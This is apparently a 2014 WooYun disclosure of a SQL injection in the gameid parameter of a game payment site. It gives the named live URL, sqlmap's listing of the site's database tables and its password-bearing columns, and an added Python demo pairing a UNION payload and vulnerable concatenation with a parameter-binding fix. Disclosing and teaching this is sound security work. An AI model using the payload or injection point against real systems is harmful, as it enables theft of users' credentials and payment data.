WooYun (WooYun.org) historical vulnerability lookup---http://wy.zone.ci/
WooYun Drops articles online---http://drop.zone.ci/
2014-07-04: Details reported to the vendor, awaiting vendor response
2014-07-04: Vendor confirmed; details disclosed to the vendor only
2014-07-14: Details disclosed to core white hats and relevant domain experts
2014-07-24: Details disclosed to regular white hats
2014-08-03: Details disclosed to intern white hats
2014-08-18: Details disclosed to the public
As per the title.
Injection point:
http://pay.5see.com/Pay/LyPay?gameid=wycq
Databases:
available databases [3]:
[*] information_schema
[*] test
[*] vxgametv
Database: vxgametv[390 tables]+---------------------------------+| ad_gun_list || admin_login_log || admin_rollback || admindonelog || admindonetype || agent_bill || agent_chongka_ticheng || agent_login_log || agent_moneylog || agent_ticheng_pay_list || agent_zhuchi || agenttichengtype || auth_auser || auth_auser_bk || auth_group || auth_group_permissions || auth_message || auth_permission || auth_session || auth_session_log || auth_session_log_old || auth_session_stat || auth_session_stat_0615 || auth_session_view || auth_session_view_basic || auth_user || auth_user_groups || auth_user_user_permissions || b_advice || b_re_advice || bank_list_05 || bankcoin_log_stat || bill || bill_waika || blackmyname || card_agent || card_agent_getback_bklist || cardlogin_log || cards || cards_changename || cards_cread_log || cards_event || cards_list_100 || cards_list_1000 || cards_list_500 || cards_list_vip || cards_product || cards_storage || cards_storage_log || cargame_tj || cargame_tj_old || carrobot_list || category || chargesubmit || chargesubmit_waika || chatavatar || coin_control_otherthing || coin_jifen_statistics || coin_log_stat || coin_score_daily || coinauth || cross_online_stat || ddlchangelog || django_content_type || django_session || django_site || dynaic_page || egg_config || egg_config_gift_list || egg_degree_level || egg_eventscore || egg_get_log || egg_gift_list || egg_hit_log || egg_owner || error_log || event1_chooseteams || event1_teamgroups || event1_teams || event_awardlist || event_dance_list || event_dance_list_log || event_list || event_lottery || event_survey || event_type || event_yuanxiao || exchange || exchange2 || exchange_old || exchange_old_140408 || exchangetime || filter || flash || flashclass || flashgame || game_gifts || game_intro_admin || game_intro_list || game_intro_pay_list || game_intro_task || game_intro_uid_log || game_intro_uid_temp || game_pay_rate_list || game_server_list || game_stat || game_uid_ip_list || gamenotices || 
gamenotices_type || gj_member || gmtv_board || gmtv_members || gmtv_room_ad || gmtv_room_favorites || gmtv_room_group || gmtv_room_link_group || gmtv_room_sign || gmtv_server_config || gmtv_update || gmtv_update2 || gmtv_user_stat || gmtvbankcoin || gmtvbankcoinlog || gmtvcoin || gmtvcoinlog || gmtvcoinlog_05_bk || gmtvcoinlog_1304 || gmtvdegree || gmtvdegreelog || gmtvniuniuscore || gmtvniuniuscorelog || gmtvroomcoin || gmtvroomcoinlog || gmtvroomscore1303 || gmtvroomscore1303log || gmtvroomscore1304 || gmtvroomscore1304log || gmtvroomscore1305 || gmtvroomscore1305log || gmtvroomscore1306 || gmtvroomscore1306log || gmtvroomscore1307 || gmtvroomscore1307log || gmtvroomscore1308 || gmtvroomscore1308log || gmtvroomscore1309 || gmtvroomscore1309log || gmtvroomscore1310 || gmtvroomscore1310log || gmtvroomscore1311 || gmtvroomscore1311log || gmtvroomscore1312 || gmtvroomscore1312log || gmtvroomscore1401 || gmtvroomscore1401log || gmtvroomscore1402 || gmtvroomscore1402log || gmtvroomscore1403 || gmtvroomscore1403log || gmtvroomscore1404 || gmtvroomscore1404log || gmtvroomscore1405 || gmtvroomscore1405log || gmtvroomscore1406 || gmtvroomscore1406log || gmtvroomscore1407 || gmtvroomscore1407log || gmtvroomscore1408 || gmtvroomscore1408log || gmtvroomscore1409 || gmtvroomscore1409log || gmtvroomscore1410 || gmtvroomscore1410log || gmtvroomscore1411 || gmtvroomscore1411log || gmtvroomscore1412 || gmtvroomscore1412log || gmtvscore || gmtvscorelog || help || help_class || host_award_type || host_aword_player || host_player_sign_up || host_score || host_score_item || host_vote || ht_page_login_list || ht_pay_list || ht_tui_statistic_list || ip_merge || ktv_board || ktv_members || ktv_room_ad || ktv_room_favorites || ktv_room_group || ktv_room_link_group || ktv_room_sign || ktv_room_type || ktv_room_type_relevance || ktv_server_config || ktv_update || ktv_update2 || ktv_user_stat || ktvrooms || link || liveroom || lockinfo || ly_enabled_ip || ly_game_cards || ly_game_playlog || 
ly_game_servers || ly_games || member || member_131218 || member_blockip || member_blockipsegment || member_cert || member_changescore_log || member_coin_score_sum_month || member_consumepoint || member_daheng_details || member_daixin_zhuchi || member_device || member_device_more || member_index_tj || member_intro_0709 || member_intro_ly_0621 || member_introducer || member_introducer_log || member_introducer_login_log || member_introducer_placeid_ratio || member_introducer_temp_t0 || member_level_type || member_login_room || member_masterscore_bk || member_money_day_list || member_not_display || member_null_cnt || member_own || member_phoneqqsina || member_qq || member_registerip || member_robot || member_scorelog || member_site_level || member_statistics || member_statistics_zhuchi || member_test || member_than1700 || member_tui_admin || member_tuistatistics || member_tuistatistics2 || member_tuistatistics_not_ratio || member_tuistatisticste || member_tuistatisticste2 || member_updengji_stat || member_usedcard_record || member_usedcard_record_month || member_useddate || member_zhuchi || member_zhuchi_details || membercheackip || menu1 || menuright1 || mm_admin || mm_album || mm_album_good || mm_albumcomment || mm_albumreply || mm_auser_list || mm_category || mm_follow || mm_guestbook || mm_guestbookreply || mm_info || mm_mood || mm_moodcomment || mm_moodcomment_reply || mm_photo || mm_show_album || mm_show_banner || mm_show_user || mm_uservisited || multiroom || multiroom1 || multiroom_renqi || multiroom_statistics_new || ngame_authoperates || ngame_games || ngame_gameservers || ngame_gametypes || ngame_introinfo || ngame_introtuiguang || ngame_introtuigurl || ngame_introtype || ngame_introusers || ngame_managers || ngame_menugroups || ngame_menus || ngame_normalusers || ngame_rolepowers || ngame_roles || ngame_ticdetail || ngame_ticscheme || notice || notice_type || number_segment || pay_cards || pay_cards_log || pay_cards_stat || pay_cards_type || pay_channel || 
pay_channel_use || pay_coin || pay_list || pay_list_1401 || pay_list_xs || pay_monthly || pay_monthly_log || pay_type || phone_advs || plat_event_list || plat_event_nangua || plat_events || platform || qianmoneylog || real_exchange || real_returnchangecode || real_returncode || remotelog_application || remotelog_logmessage || rooms_popularity_day || rpt_cards_daily || rvdb_member || saleusers || score_log_stat || seee_room_group || seee_room_link_group || seee_server_config || servers || shengzhouxing_bill || siting_config || sqlmapoutput || st_applist || st_apptypes || st_default_event || st_platforms || st_user_event || statistic_platform || sys_monitorchangelog || sysdiagrams || syslog || system_admin || system_adminpermissions || system_creaduser_log || system_menufather || system_permissions || tableidcontrol || tableidcontrol_game || tb_pro_city || tb_sales_detail || tehao || tehao_new || tehao_vip_yin || temp_lydd || temp_psdid || tenroom_userinfo || tg_qq_url_list || tip_client || tmp2 || tmp_active_zc || tmp_active_zc2 || tmp_coinless100 || tmp_coinless100_group || tmp_shell || tmp_shell2 || trade_recover_log || tui_zhuang_log || tuigliveroom || u766_room_group || u766_room_link_group || u766_server_config || user_block_reason || user_frver_list || user_machine || user_machine_block || v_introusers || zhuchi_score_month || zhuchi_shelldaystatistic |+---------------------------------+
A few of the tables:
Database: vxgametv
Table: member_qq
[5 columns]
+------------+-------------+
| Column     | Type        |
+------------+-------------+
| createtime | timestamp   |
| pwd        | varchar(64) |
| qqopenid   | varchar(32) |
| src_type   | varchar(20) |
| useridx    | bigint(22)  |
+------------+-------------+

Database: vxgametv
Table: bill
[13 columns]
+----------+---------------+
| Column   | Type          |
+----------+---------------+
| Amount   | decimal(18,2) |
| b_id     | int(11)       |
| billno   | varchar(50)   |
| cardtype | varchar(10)   |
| coin     | bigint(20)    |
| date     | char(14)      |
| kbillno  | varchar(30)   |
| masterid | varchar(20)   |
| Memo     | varchar(255)  |
| paydate  | datetime      |
| PayWay   | varchar(20)   |
| succ     | varchar(1)    |
| UserID   | varchar(20)   |
+----------+---------------+
I only ran a test.
There is too much information here; fix it quickly, or the problem will become serious.
Severity: High
Vulnerability Rank: 18
Confirmed: 2014-07-04 12:13
Already submitted to the relevant staff for fixing; injection has never been taken seriously.
None yet
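The report gives only the injection point (the gameid parameter of /Pay/LyPay) and sqlmap's view of the vxgametv database; it shows no server code. The Python example below is added here and is not code from the original report, the reporter, or the vendor. It shows the pattern that produces this class of bug and its fix on a constructed stand-in: a lookup that concatenates gameid into the query text, the same lookup with a bound parameter, and an allowlist check in front of it, exercised with a UNION payload that pulls rows out of member_qq. Only the table names (ly_games, member_qq) and the member_qq column names come from the report; the ly_games columns, the row contents, the lookup logic, and the use of SQLite in place of the MySQL backend are assumptions for the demo.

```python
import re
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed stand-in schema.

    Table and column names for member_qq follow the report; the columns of
    ly_games and every row here are assumptions made for this example.
    """
    conn = sqlite3.connect(":memory:")
    conn.executescript(
        """
        CREATE TABLE ly_games (gameid TEXT PRIMARY KEY, name TEXT);
        INSERT INTO ly_games VALUES ('wycq', 'game-wycq');
        INSERT INTO ly_games VALUES ('other', 'game-other');
        CREATE TABLE member_qq (useridx INTEGER, qqopenid TEXT, pwd TEXT);
        INSERT INTO member_qq VALUES (1001, 'openid-a', 'hash-a');
        INSERT INTO member_qq VALUES (1002, 'openid-b', 'hash-b');
        """
    )
    return conn


def lookup_game_vulnerable(conn: sqlite3.Connection, gameid: str) -> list:
    # String concatenation: whatever arrives in ?gameid= becomes SQL text.
    sql = "SELECT name FROM ly_games WHERE gameid = '" + gameid + "'"
    return [row[0] for row in conn.execute(sql)]


def lookup_game_safe(conn: sqlite3.Connection, gameid: str) -> list:
    # Parameter binding: gameid travels as data and is never parsed as SQL.
    sql = "SELECT name FROM ly_games WHERE gameid = ?"
    return [row[0] for row in conn.execute(sql, (gameid,))]


# Assumed shape of a legitimate game code (short, lower-case alphanumeric).
GAMEID_RE = re.compile(r"[a-z0-9_]{1,32}")


def is_valid_gameid(gameid: str) -> bool:
    return GAMEID_RE.fullmatch(gameid) is not None


def lookup_game_validated(conn: sqlite3.Connection, gameid: str) -> list:
    # Defence in depth: reject implausible input before it reaches the
    # database, then still use a bound parameter.
    if not is_valid_gameid(gameid):
        raise ValueError("invalid gameid")
    return lookup_game_safe(conn, gameid)


# UNION-based payload in the form it would be sent as ?gameid=...
# The trailing "--" comments out the closing quote the query appends itself.
UNION_PAYLOAD = "wycq' UNION SELECT qqopenid || ':' || pwd FROM member_qq --"


def demo() -> dict:
    conn = make_db()
    return {
        "normal": lookup_game_vulnerable(conn, "wycq"),
        # Concatenated query: returns the game row plus every member_qq row.
        "vulnerable": sorted(lookup_game_vulnerable(conn, UNION_PAYLOAD)),
        # Bound parameter: the payload is just an unknown gameid, no match.
        "safe": lookup_game_safe(conn, UNION_PAYLOAD),
        "payload_passes_allowlist": is_valid_gameid(UNION_PAYLOAD),
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(key, value)
```

The allowlist is not a substitute for parameter binding: it only narrows what reaches the query, while binding is what removes the injection. Keeping both means a later change to the query (a LIKE clause, a numeric column) does not silently reopen the hole.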